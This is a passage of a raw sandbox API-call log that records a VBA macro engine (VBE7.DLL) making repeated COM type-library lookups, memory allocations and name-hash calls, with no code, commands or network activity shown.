(This=0x1d39d9d55e8) returned 0x3 [0060.472] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.472] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.472] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.472] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.473] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.473] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.473] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.473] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.473] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.473] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.473] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.473] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.473] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.473] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.473] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.473] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.473] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.473] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.473] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.473] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.473] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.473] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.473] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.473] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.473] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.473] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.474] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.474] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.474] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.474] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.474] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.474] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.474] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.474] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.474] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.474] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.474] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.474] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.474] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.474] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.474] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.474] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.474] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.474] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.474] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.474] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.474] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.474] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.474] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.474] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.474] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.475] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.475] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.475] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.475] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.475] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.475] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.475] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.475] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.475] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.475] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.475] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.475] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.475] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.475] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.475] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.475] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.475] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.475] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.475] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.475] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.475] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.475] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.475] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.475] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.475] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.475] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.476] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.476] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.476] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d50000 [0060.476] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.476] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.476] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.476] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.476] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.476] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.476] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.476] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.476] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.476] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.477] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.477] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.477] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.477] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.477] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.477] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.477] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.477] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.477] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.477] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.477] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.477] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.477] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.477] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.477] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.477] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.477] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.477] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.477] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.477] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.478] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.478] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.478] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.478] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.478] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.478] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.478] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.478] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.478] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.478] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.478] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.478] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.478] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.478] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.478] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.478] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.478] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.478] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.478] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.478] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.478] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.478] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.478] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.478] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.478] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.478] IMalloc:Free 